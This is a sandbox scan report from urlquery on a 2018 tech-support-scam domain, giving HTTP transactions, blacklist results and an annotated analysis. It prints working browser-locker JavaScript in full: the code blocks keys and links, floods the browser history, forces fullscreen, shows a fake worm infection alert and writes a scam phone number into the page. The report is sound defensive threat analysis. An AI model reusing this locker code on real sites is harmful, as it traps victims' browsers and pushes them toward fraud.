Overview

URL bfswqrt.gq
IP 50.62.22.142
ASN AS26496 GoDaddy.com, LLC
Location United States
Report completed 2018-07-20 18:01:43 CEST
urlquery Alerts Scam / Cryptowall detected — note: "Scam / Cryptowall" is urlquery's signature label only; what was actually captured is a tech-support-scam browser locker (a fake "MICROSOFT SECURITY WARNING" page that pushes a toll-free number through an HTTP Basic-auth realm and document.write, and traps the tab with history flooding, forced fullscreen and alert loops), not CryptoWall ransomware. The IDS and all six blacklists below returned no alerts, so this heuristic is the only detection on the page.


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata w/ Emerging Threats Pro  No alerts detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter  No alerts detected
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 50.62.22.142

Date UQ (urlquery alerts) / IDS (Suricata alerts) / BL (blacklist hits) URL IP
2018-07-20 18:13:10 +0200
1 - 0 - 1 bfswqrt.ga/iedge/security.php 50.62.22.142
2018-07-20 17:43:41 +0200
1 - 1 - 0 bfswqrt.ga/fir/security.php 50.62.22.142
2018-07-20 17:35:09 +0200
3 - 1 - 0 bfswqrt.ga 50.62.22.142
2018-07-20 17:31:56 +0200
3 - 0 - 0 bfswqrt.gq 50.62.22.142
2018-07-18 19:12:40 +0200
3 - 1 - 7 upsrtce.gq 50.62.22.142
2018-07-17 01:48:50 +0200
3 - 3 - 0 lksdert.ga/wm 50.62.22.142
2018-07-17 01:46:18 +0200
0 - 0 - 0 lksdert.ga 50.62.22.142
2018-07-17 01:36:55 +0200
0 - 0 - 0 50.62.22.142 50.62.22.142
2018-07-03 00:44:27 +0200
0 - 0 - 0 50.62.22.142 50.62.22.142
2018-06-29 20:54:27 +0200
3 - 3 - 7 cbqaktsh.gq/ 50.62.22.142

Last 10 reports on ASN: AS26496 GoDaddy.com, LLC

Date UQ (urlquery alerts) / IDS (Suricata alerts) / BL (blacklist hits) URL IP
2019-06-20 11:06:29 +0200
0 - 0 - 0 50.63.202.51 50.63.202.51
2019-06-20 10:54:14 +0200
0 - 0 - 0 x.co/6nsMz 45.40.140.1
2019-06-20 10:52:58 +0200
0 - 0 - 0 x.co/6nsMz 45.40.140.1
2019-06-20 10:49:30 +0200
0 - 0 - 0 https://x.co/6nsMz 45.40.140.1
2019-06-20 07:27:18 +0200
0 - 0 - 0 wifiservicepro.com 50.63.202.47
2019-06-20 07:26:40 +0200
0 - 0 - 0 www.freedompop.com.mx 184.168.221.47
2019-06-20 07:00:56 +0200
0 - 0 - 0 www.bdargo.com 50.63.124.28
2019-06-20 04:57:54 +0200
0 - 0 - 0 austin1020.com/?reqp=1&reqr 184.168.221.69
2019-06-20 04:00:00 +0200
0 - 0 - 0 asiabizpro.info 107.180.41.83
2019-06-20 03:29:27 +0200
0 - 0 - 0 cairoscene.me/Business/egypt-top-export-uae 184.168.131.241

Last 1 reports on domain: bfswqrt.gq

Date UQ (urlquery alerts) / IDS (Suricata alerts) / BL (blacklist hits) URL IP
2018-07-20 17:31:56 +0200
3 - 0 - 0 bfswqrt.gq 50.62.22.142


JavaScript

Executed Scripts (13)


Executed Evals (1)

#1 JavaScript::Eval (size: 3106, repeated: 1) - SHA256: 0650a162ced3ca9e279ed32a7f346d3e4533d8c8e838e880501e104b9f504b0f

                                        // NOTE(review): browser-locker ("tech-support scam") payload exactly as the
                                        // sandbox saw it passed to eval(). Annotated for analysis only; the code is
                                        // left byte-for-byte as captured. `$`, `text`, `isFirefox`, `isChrome`,
                                        // `isOpera`, `isIE` and `isSafari` are globals supplied by the enclosing
                                        // page, not by this eval, so their exact values are not visible here
                                        // (`text` is presumably the scam message -- it is what every prompt shows).
                                        $(function() {
    if (isFirefox) {
        // Neutralise every link so the victim cannot click away from the page.
        $("a").click(function(e) {
            e.preventDefault()
        });
        // Obfuscation: a string table rotated in place. u is 325 and is
        // pre-incremented to 326; the loop body runs 325 times (`--e` stops
        // at 0) and 325 mod 6 == 1, so the table ends up rotated left by one:
        //   0 "onbeforeunload", 1 "", 2 "returnValue", 3 "onload",
        //   4 "toString", 5 "pushState".
        // o and u are assigned before their `var` below -- hoisting makes that legal.
        var e = ["pushState", "onbeforeunload", "", "returnValue", "onload", "toString"];
        o = e, u = 325,
            function(e) {
                for (; --e;) o.push(o.shift())
            }(++u);
        // Lookup helper: "0x1" - 0 === 1, i.e. the hex string is coerced to an
        // index into the rotated table. The parameter shadows the outer n.
        var n = function(n, t) {
            return e[n -= 0]
        };
        // window.onbeforeunload = function(e) { e.returnValue = "" + text; ... }
        // -- forces a leave-page prompt carrying the scam message.
        t = text, window[n("0x0")] = function(e) {
            var o = n("0x1") + t;
            return e[n("0x2")] = o, o
        }, window[n("0x3")] = function() {
            // window.onload: both branches of the confirm() are identical --
            // 1e8 iterations of o.toString() / history.pushState(), which
            // floods the session history and hangs the tab no matter what
            // the victim answers. The confirm() itself is just another
            // modal that shows `text`.
            if (confirm("" + t))
                for (var e = "", o = 0; o < 1e8; o++) e += o[n("0x4")](), history[n("0x5")](0, 0, e);
            else
                for (e = "", o = 0; o < 1e8; o++) e += o[n("0x4")](), history[n("0x5")](0, 0, e)
        }
    }
    var t, o, u, r, c, i, l;
    if (isChrome || isOpera) {
        // d is a first-call latch for a(): the first trigger only arms it,
        // every later trigger shows the fake "blue screen".
        var d = !1;
        // Load extra assets, start the page's looping audio element, and swallow
        // every keydown/keypress and the context menu. The onbeforeunload text
        // contains non-ASCII characters that this capture rendered as '?'.
        // `new Function("return false")` is an obfuscated `function(){return false}`.
        $("head").append('<script src="./js/jquery.js"><\/script>'), $("head").append('<link href="./css/main.css" rel="stylesheet">'), document.getElementById("audio").play(), window.onkeydown = function(e) {
            // Block all keyboard input (e.g. F5, Ctrl+W) while the page is up.
            return !1
        }, window.onkeypress = function(e) {
            return !1
        }, onbeforeunload = function() {
            // Leaving the page first pops a modal alert, then the browser's
            // own leave-page prompt with the same text.
            return alert("??????? ESC, ????? ??????? ????????!"), "??????? ESC, ????? ??????? ????????!"
        }, document.oncontextmenu = new Function("return false");
        // Dead code: 0 < 0 is false on entry, so this alert never fires.
        for (var s = 0; s < 0; s++) alert(text);

        // a(): arm on first call; on every later call show #blue-screen and
        // switch the body to the "past" class (the fake crash screen).
        function a() {
            d ? (document.getElementById("blue-screen").style.display = "block", document.getElementsByTagName("body").item(0).setAttribute("class", "past")) : d = !0
        }

        // m(): force fullscreen if not already (hides the browser chrome so the
        // fake alert looks like the OS), then open blue.php in a 1x1 popup
        // positioned at left/top 3000 -- i.e. off-screen on most displays.
        function m() {
            document.fullscreenElement || document.mozFullScreenElement || document.webkitFullscreenElement || (document.documentElement.requestFullscreen ? document.documentElement.requestFullscreen() : document.documentElement.mozRequestFullScreen ? document.documentElement.mozRequestFullScreen() : document.documentElement.webkitRequestFullscreen && document.documentElement.webkitRequestFullscreen(Element.ALLOW_KEYBOARD_INPUT)), window.open("blue.php", "Alert", "width=1,height=1,scrolling=yes,fullscreen=yes,left=3000,top=3000")
        }
        // Show the fake Chrome alert overlay, then hook the keys a victim would
        // use to escape: keyCode 27 (Escape) re-enters fullscreen; 122 (F11),
        // 17 (Ctrl), 18 (Alt) and 13 (Enter) also trigger the blue screen.
        // Note the `||` form: the (a(), m()) pair runs only when the key IS
        // one of the four.
        document.getElementById("chrome-alerts").style.display = "block", document.addEventListener("keyup", function(e) {
            27 == e.keyCode && m()
        }, !1), document.addEventListener("keyup", function(e) {
            122 != e.keyCode && 17 != e.keyCode && 18 != e.keyCode && 13 != e.keyCode || (a(), m())
        }, !1), window.onload = function() {
            // Any click after load: fullscreen + popup, then the blue screen.
            // `target` is an implicit global and target.tagName is discarded.
            document.onclick = function(e) {
                e = e || event, target = e.target || e.srcElement, target.tagName, m(), a()
            }
        }, addEventListener("click", function() {
            // Second click handler registered immediately (before onload):
            // trips the latch and requests fullscreen via whichever vendor
            // method exists.
            a();
            var e = document.documentElement;
            (e.requestFullScreen || e.webkitRequestFullScreen || e.mozRequestFullScreen).call(e)
        }), window.addEventListener("resize", function() {
            // Leaving fullscreen fires resize: re-lock scrolling, slide the
            // popup alert in, restart the audio, and start ANOTHER interval
            // that pushes 100 history entries every 500 ms. The interval is
            // never cleared and one is added per resize, so the Back button
            // is buried and CPU load climbs. screen.width / window.innerWidth
            // are evaluated and discarded.
            $("body").css("overflow", "hidden"), $(".popup-alert").stop().animate({
                bottom: "-10px",
                opacity: 1
            }, 500), document.getElementById("audio").play(), screen.width, window.innerWidth, window.setInterval(function() {
                for (var e = 0; e < 100; e++) history.pushState(0, 0, e)
            }, 500)
        })
    }
    if (isIE || isSafari) {
        $("#blue-screen,.chrome-alert").hide();
        // Same rotation trick as the Firefox branch: l is 361, pre-incremented
        // to 362, body runs 361 times, 361 mod 6 == 1 -> rotated left by one:
        //   0 "body", 1 "addEventListener", 2 "mouseout", 3 <fake infection
        //   banner>, 4 "attachEvent", 5 "onmouseout".
        // "RDN/YahLover.worm!055BCCAC9FEC" is the string shown to the victim as
        // a supposed detection name; nothing on this page is actually scanned.
        var f = ["onmouseout", "body", "addEventListener", "mouseout", "*************************************************\nRDN/YahLover.worm!055BCCAC9FEC Infection\n*************************************************\n\n", "attachEvent"];
        i = f, l = 361,
            function(e) {
                for (; --e;) i.push(i.shift())
            }(++l);
        var y = function(e, n) {
            return f[e -= 0]
        };
        // alert(text) once, then: document.body.addEventListener("mouseout",
        // alert(banner + text)) on modern engines, or
        // document.body.attachEvent("onmouseout", alert(text)) on legacy IE.
        // Every time the pointer leaves the body (e.g. reaching for the
        // address bar or close button) another modal appears, and
        // onbeforeunload returns `text` so closing the tab prompts too.
        r = text, c = text, alert(r), document[y("0x0")][y("0x1")] ? document[y("0x0")][y("0x1")](y("0x2"), function(e) {
            alert(y("0x3") + r)
        }, !1) : document[y("0x0")][y("0x4")](y("0x5"), function(e) {
            alert(r)
        }), window.onbeforeunload = function() {
            return c
        }
    }
});
                                    

Executed Writes (3)

#1 JavaScript::Write (size: 15, repeated: 2) - SHA256: fadc4663cec73362b18293cee8da77c79bfe23af94b56af7711730d72bcbb2c3

                                        +1 - 888 - 348 - 1617
                                    

#2 JavaScript::Write (size: 50, repeated: 1) - SHA256: c3f5f9996575314b7e02e5f36f9cfb04424de9b52da48c860b562ce4e37dd4c3

                                        < span style = "color:#7fff7f" > +1 - 888 - 348 - 1617 < /span>
                                    

#3 JavaScript::Write (size: 67, repeated: 1) - SHA256: 59d5d452c8dc7921ef6b063343058f1bad9dea141baae622ceca624c6ea34035

                                        < span style = "font-size:22;font-weight:bold;" > +1 - 888 - 348 - 1617 < /span>
                                    


HTTP Transactions (23)


Request Response
                                        
                                            GET / HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Fri, 20 Jul 2018 16:01:12 GMT
Server: Apache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  HTML document text
Size:   36928
Md5:    63c58b586c4e04a2996f37f9cffbdcdf
Sha1:   c7b815f57c09c973b15d2d57459bc1a8b05008ed
Sha256: dc0ba789dcc63b12425a34e98dd3a71d3fcf7e44f8b1250e5e596eac655cca0d
                                        
                                            GET /chrome-assests/alert.css HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Fri, 20 Jul 2018 16:01:13 GMT
Server: Apache
Last-Modified: Sat, 25 Nov 2017 05:22:40 GMT
Accept-Ranges: bytes
Content-Length: 2981
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines
Size:   2981
Md5:    5196ccfee9569b0be1fb4a4fb0189f70
Sha1:   d0d701a487759e10831c7ba2c503855ab856ccea
Sha256: b3679448a88b0b8f35c8947ec3a1591436bffcc752c2e96f946626d990502ba6
                                        
                                            GET /chrome-assests/style.css HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Fri, 20 Jul 2018 16:01:13 GMT
Server: Apache
Last-Modified: Sat, 25 Nov 2017 05:22:34 GMT
Accept-Ranges: bytes
Content-Length: 23238
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII English text, with very long lines
Size:   23238
Md5:    e74fa9c2311b591291e28b68eaf6d0c7
Sha1:   6f97982754bbe9b8c4cd6524e8e0490a541f86f3
Sha256: 8e3025342e6473670fbb8bf4df98a8454c75a2b288fd54dba9bbca8e9e3c9438
                                        
                                            GET /chrome-assests/translator.css HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Fri, 20 Jul 2018 16:01:13 GMT
Server: Apache
Last-Modified: Sat, 25 Nov 2017 05:22:36 GMT
Accept-Ranges: bytes
Content-Length: 20763
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines
Size:   20763
Md5:    26c0245f59b273d110d73a343ca33fc1
Sha1:   ac49c860727f5f16196a338128bb5a909e53d3ce
Sha256: 8e518d27455b893e291bf603d02b9c3d7f417ca2e6cd3c9f9833c3c16a18633d
                                        
                                            GET /chrome-assests/iframe.js HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Fri, 20 Jul 2018 16:01:13 GMT
Server: Apache
Last-Modified: Sat, 25 Nov 2017 05:22:40 GMT
Accept-Ranges: bytes
Content-Length: 185
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text
Size:   185
Md5:    ff327d44c7800f0e8483ad6f7a05204c
Sha1:   777c24b9bf141ce17f62749e1a94ca6a319f2719
Sha256: cb1194ccca4f9765c5a332bba8506c4d960f13b54c830a3dbde986eac8e3d2b9
                                        
                                            GET /chrome-assests/retreaver.js HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Fri, 20 Jul 2018 16:01:13 GMT
Server: Apache
Last-Modified: Sat, 25 Nov 2017 05:22:40 GMT
Accept-Ranges: bytes
Content-Length: 16164
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines
Size:   16164
Md5:    c7f736410d8fd53b1fcbeb55621122b4
Sha1:   75f9041b398604e62c6de857921838c8ea8413ef
Sha256: 5e944017e7e53e4654ad11fb20fca627e5e7c49fb9aab62fbde3aef3b51f2fff
                                        
                                            GET /chrome-assests/jquery-1.js HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Fri, 20 Jul 2018 16:01:13 GMT
Server: Apache
Last-Modified: Sat, 25 Nov 2017 05:22:44 GMT
Accept-Ranges: bytes
Content-Length: 95930
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines
Size:   95930
Md5:    019c5fb7c4771808dc65e1096c771348
Sha1:   44a33096a0498722bc286c5f190d37b070db2d23
Sha256: c8963b6bd2ca8497603794bf9adcbff7a3ea55c9c3edef3d5a992405ee256a90
                                        
                                            GET /chrome-assests/bootstrap.css HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Fri, 20 Jul 2018 16:01:13 GMT
Server: Apache
Last-Modified: Sat, 25 Nov 2017 05:22:42 GMT
Accept-Ranges: bytes
Content-Length: 121291
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII C program text, with very long lines
Size:   121291
Md5:    69911a571506910fe2beddc7ed1f1e7e
Sha1:   a995df4c3a89c7c012af30857b61bef6021ab608
Sha256: cbbd6c980d02125fe27e5752e9f47dfa55845794b0d4fc0444a4211117bee6e5
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         50.62.22.142
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Fri, 20 Jul 2018 16:01:13 GMT
Server: Apache
Content-Length: 328
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   328
Md5:    301fa7ceb5b3c291d4bbeee953048686
Sha1:   758d921efd60d4e9f0f6d77648ccc500c8611fea
Sha256: 6b62a3658ad247e8f30d3e9f35da5e00ffac1ea09785bd1f0a9830f659cf01da
                                        
                                            GET /fir/ HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Date: Fri, 20 Jul 2018 16:01:13 GMT
Server: Apache
Last-Modified: Wed, 27 Jun 2018 03:06:22 GMT
Accept-Ranges: bytes
Content-Length: 18078
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  UTF-8 Unicode English text, with very long lines, with CRLF line terminators
Size:   18078
Md5:    ba2e4ce56c2b34f75889797881faea03
Sha1:   2e0d22be949a4ea19833c4638e29d66c1fb917f7
Sha256: 556614a48bec490e1615b88ea97b360f3ec7c5e7737c6bef8f70a4231ad47aa8

Alerts:
  urlquery:
    - Scam / Cryptowall detected
                                        
                                            GET /fir/img/bg-3.jpg HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/fir/

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Fri, 20 Jul 2018 16:01:14 GMT
Server: Apache
Last-Modified: Fri, 15 Jun 2018 06:43:56 GMT
Accept-Ranges: bytes
Content-Length: 3975
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   3975
Md5:    81478c4a3b80a6e8653d69f0ca5891c2
Sha1:   455d4b4e3199c42b709d0969d86bbf1ed11ab94d
Sha256: b3af1026630c44ba25ea1e3bb86c15d9a0c1de5d9b19633fb2205488fba06e7e
                                        
                                            GET /fir/img/defender.png HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/fir/

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Fri, 20 Jul 2018 16:01:14 GMT
Server: Apache
Last-Modified: Fri, 15 Jun 2018 06:43:54 GMT
Accept-Ranges: bytes
Content-Length: 13386
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  PNG image, 230 x 193, 8-bit/color RGBA, non-interlaced
Size:   13386
Md5:    02038697048ee6bd245a1a7bf533d2b8
Sha1:   c5c85f99b3a82aeef1a90d84559d5f4cc402215b
Sha256: 7ce2ae13d717596ff63a6d0694e87f94d96246a2d5fa7d8d153fb17af7d0d42d
                                        
                                            GET /fir/img/bg-1.jpg HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/fir/

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Fri, 20 Jul 2018 16:01:14 GMT
Server: Apache
Last-Modified: Fri, 15 Jun 2018 06:43:54 GMT
Accept-Ranges: bytes
Content-Length: 12859
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   12859
Md5:    070b78fb721a3489d079467f6d7397e6
Sha1:   95ecd3e20c235a80617c29553c362576fb935f88
Sha256: 2a515626327b3a78913b0a27d3b7ddbd2e3a8a9b54c6e133a69ae7fe52d33870
                                        
                                            GET /fir/js/jquery.min.js HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/fir/

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Fri, 20 Jul 2018 16:01:14 GMT
Server: Apache
Last-Modified: Fri, 15 Jun 2018 06:43:56 GMT
Accept-Ranges: bytes
Content-Length: 97244
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines
Size:   97244
Md5:    bdc2b7efb1faf219d65edfe253a103e9
Sha1:   4921529fc15b8133f2fe65b3bebf53d1e9ef8579
Sha256: 95914789b5f3307a3718679e867d61b9d4c03f749cd2e2970570331d7d6c8ed9
                                        
                                            POST /GTSGIAG3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 107
Content-Type: application/ocsp-request

                                         
                                         216.58.211.14
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 20 Jul 2018 16:01:15 GMT
Cache-Control: public, max-age=86400
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   463
Md5:    09310a3e208a93943eccf956d8fc36d1
Sha1:   8eff4dcc08a7c8131acca50c271dd8d275ad3f68
Sha256: 7f6d270f49f89e70e91cf1b27c526f97ce96681b82481da224e544d89291020c
                                        
                                            POST /gsr2 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 112
Content-Type: application/ocsp-request

                                         
                                         216.58.211.14
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 20 Jul 2018 16:01:15 GMT
Cache-Control: public, max-age=86400
Server: ocsp_responder
Content-Length: 468
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   468
Md5:    d9d754520ae3340aa37cca6115eee05b
Sha1:   a0320372760d99c762cb2eb4b37f776625ef1b33
Sha256: 7dc8284c51c9a38dc1bf03bd28857ea5336e8f5c564eddbb1c9082ee43c93738
                                        
                                            GET /gtag/js?id=UA-116176892-2 HTTP/1.1 
Host: www.googletagmanager.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/fir/

                                         
                                         216.58.211.8
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=UTF-8
                                        
Access-Control-Allow-Origin: http://www.googletagmanager.com
Access-Control-Allow-Headers: Cache-Control
Access-Control-Allow-Credentials: true
Content-Encoding: gzip
Vary: Accept-Encoding
Date: Fri, 20 Jul 2018 16:01:15 GMT
Expires: Fri, 20 Jul 2018 16:01:15 GMT
Cache-Control: private, max-age=900
Server: Google Tag Manager (scaffolding)
X-XSS-Protection: 1; mode=block
Alt-Svc: quic=":443"; ma=2592000; v="44,43,39,35"
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   25190
Md5:    5f5ac2d34f5022f3feab12335c0ab41f
Sha1:   827865710cd3e77c1f660bcfc63d58908106cd2d
Sha256: b07072de4f6d6b0f79f84aa1233b4e5a486709e6eda0e85b1438254da073b775
                                        
